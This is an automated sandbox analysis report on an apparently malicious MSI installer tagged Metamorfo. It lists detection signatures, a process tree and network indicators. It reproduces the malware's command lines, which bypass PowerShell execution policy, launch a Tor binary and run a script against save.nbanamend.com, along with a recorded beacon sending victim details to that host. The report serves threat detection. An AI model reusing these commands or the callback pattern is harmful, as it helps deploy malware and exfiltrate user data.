Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report YwZpT3p5Rh.msi

Overview

General Information

Sample Name:YwZpT3p5Rh.msi
Analysis ID:527489
MD5:5bfe975a60a97c93175c935c6d621e04
SHA1:5bc30f0f540a957d2cc489bbce2c1a7f137069e0
SHA256:464fe77f576d8273564bb5b7976b381855d962017f4da6b5a363af78bf788799
Tags:Metamorfomsi
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Suspicious Script Execution From Temp Folder
Wscript starts Powershell (via cmd or directly)
Found Tor onion address
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Powershell drops PE file
May use the Tor software to hide its network traffic
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found dropped PE file which has not been started or loaded
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 896 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\YwZpT3p5Rh.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 3084 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 2496 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 3492 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 6980 cmdline: "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • MRZANK.exe (PID: 7092 cmdline: "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE MD5: 67AB12CF6CABC14588E4F51B21C2134A)
            • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 6352 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: DBA3E6449E97D4E3DF64527EF7012A10)
              • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 6264 cmdline: "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • MRZANK.exe (PID: 6308 cmdline: "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE MD5: 67AB12CF6CABC14588E4F51B21C2134A)
      • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3492PowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x5f8b3:$sa2: -encodedCommand
  • 0x5f8df:$sa2: -encodedCommand
  • 0x5ffc0:$sa2: -EncodedCommand
  • 0x60ac1:$sa2: -EncodedCommand
  • 0x60b5c:$sa2: -encodedCommand
  • 0xa154:$sc2: -NoProfile
  • 0xa994:$sc2: -NoProfile
  • 0x19800:$sc2: -NoProfile
  • 0x256d1:$sc2: -NoProfile
  • 0x2fa60:$sc2: -NoProfile
  • 0x6aa73:$sc2: -NoProfile
  • 0x71e51:$sc2: -NoProfile
  • 0xa15f:$sd2: -Noninteractive
  • 0xa99f:$sd2: -Noninteractive
  • 0x1980b:$sd2: -Noninteractive
  • 0x256dc:$sd2: -Noninteractive
  • 0x2fa6b:$sd2: -Noninteractive
  • 0x5fddc:$sd2: -NonInteractive
  • 0x6aa7e:$sd2: -Noninteractive
  • 0x71e5c:$sd2: -Noninteractive
  • 0xa16f:$se3: -ExecutionPolicy Bypass

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Script Execution From Temp FolderShow sources
Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2496, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 3492
Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2496, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 3492
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2496, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 3492
Sigma detected: T1086 PowerShell ExecutionShow sources
Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132822036425234276.3492.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results
Source: MRZANK.exe, 00000012.00000003.437398490.0000000004146000.00000004.00000001.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----
Source: unknownHTTPS traffic detected: 104.21.91.13:443 -> 192.168.2.5:49770 version: TLS 1.0
Source: Binary string: .textn.pdb `4 source: powershell.exe, 00000017.00000002.546323293.0000000007540000.00000004.00000001.sdmp
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\JQHPQS\MRZANK.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior

Networking:

barindex
Found Tor onion addressShow sources
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: To debug, this may helpWhat was %p doing in pending_entry_connections in %s?Closing one-hop stream to '%s/%s' because the OR conn just failed.entry_conn->socks_requestGiving up on enclave exit '%s' for destination %s.At %s:%d: %p was unexpectedly in circuit_wait. Closing.Application request to port %d: this port is commonly used for unencrypted protocols. Please make sure you don't send anything you would mind the rest of the Internet reading!%sREJECTWARNDANGEROUS_PORT PORT=%d RESULT=%sPort %d listed in RejectPlaintextPorts. Closing.exitoniononion Invalid %shostname %s; rejectingClient asked for %s:%d.exitThe ".exit" notation is disabled in Tor due to security risks.SOCKS_BAD_HOSTNAME HOSTNAME=%sUnable to automap address %sAutomapping %s to %sREVERSE[%s]Missing mapping for virtual address '%s'. Refusing.Onion address %s requested from a port with .onion disabledResolve requests to hidden services not allowed. Failing.Attachstream to a circuit is not supported for .onion addresses currently. Failing.Using previously configured client authorization for hidden service request.Got a hidden service request for ID '%s'addresstype == ONION_V3_HOSTNAMEfailed to parse hs addressNot fetching.Refetching.usableunusableFound %s descriptor in cache for %s. %s.Invalid service name '%s'No descriptor found in our cache for %s. Fetching.Unknown cache lookup error %dedge_conn->rend_dataedge_conn->hs_identDescriptor is here. Great.Stale automapped address for '%s.exit'. Refusing.Address '%s.exit', with impossible source for the .exit part. Refusing.!automapMalformed exit address '%s.exit'. Refusing.Unrecognized relay in exit address '%s.exit'. Refusing.Excluded relay in exit address '%s.exit'. Refusing.Destination '%s' seems to be an invalid hostname. Failing.Refusing to connect to non-hidden-service hostname or IP address %s because Port has OnionTrafficOnly set (or NoDNSRequest, NoIPv4Traffic, and NoIPv6Traffic).Refusing to connect to hostname %s because Port has NoDNSRequest set.Refusing to connect to IPv4 address %s because Port has NoIPv4Traffic set.Refusing to connect to IPv6 address %s because Port has NoIPv6Traffic set.Application asked to connect to port 0. Refusing.Rejecting request for anonymous connection to private address %s on a TransPort or NATDPort. Possible loop in your NAT rules?%sRejecting SOCKS request for anonymous connection to private address %s.%sRejecting SOCKS request for an IP address family that this listener does not support.Rejecting SOCKS4 request for an IPv6 address.Rejecting SOCKS4 request on a listener with no IPv4 traffic supported.Redirecting address %s to exit at enclave router %saddresstype == ONION_V2_HOSTNAME || addresstype == ONION_V3_HOSTNAMEWarning! You've just connected to a v2 onion address. These addresses are deprecated for security reasons, and are no longer supported in Tor. Please encourage the site operator to upgrade. For more information see https://blog.torproject.org/v2-deprecation-timelineCalled connection_a
Source: unknownHTTPS traffic detected: 104.21.91.13:443 -> 192.168.2.5:49770 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: save.nbanamend.comConnection: Keep-Alive
Source: global trafficTCP traffic: 192.168.2.5:49775 -> 205.185.127.35:9100
Source: global trafficTCP traffic: 192.168.2.5:49788 -> 213.226.71.164:9001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.127.35
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: MRZANK.exe, 00000012.00000002.539834054.00000000032E0000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MRZANK.exe, 00000012.00000002.539834054.00000000032E0000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.com'~ equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000005.00000002.397291018.00000000029FC000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MRZANK.exe, 00000012.00000002.547207485.00000000691A2000.00000008.00020000.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.397419806.0000000004501000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: MRZANK.exe, 00000012.00000002.550461147.000000006B464000.00000008.00020000.sdmpString found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000005.00000003.348135204.00000000074E4000.00000004.00000001.sdmpString found in binary or memory: https://$domain/new.php?data=$dataEnc
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://blog.torproject.org/v2-deprecation-timeline
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://blog.torproject.org/v2-deprecation-timelineCalled
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://bugs.torproject.org/tpo/core/tor/14917.
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://bugs.torproject.org/tpo/core/tor/21155.
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://bugs.torproject.org/tpo/core/tor/8742.
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://freehaven.net/anonbib/#hs-attack06
Source: powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: MRZANK.exe, 00000012.00000002.546580931.0000000069123000.00000008.00020000.sdmpString found in binary or memory: https://www.openssl.org/H
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://www.torproject.org/
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://www.torproject.org/download/download#warning
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpString found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
Source: unknownDNS traffic detected: queries for: save.nbanamend.com
Source: global trafficHTTP traffic detected: GET /new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: save.nbanamend.comConnection: Keep-Alive
Source: MRZANK.exe, 00000012.00000002.539363033.000000000110A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Powershell drops PE fileShow sources
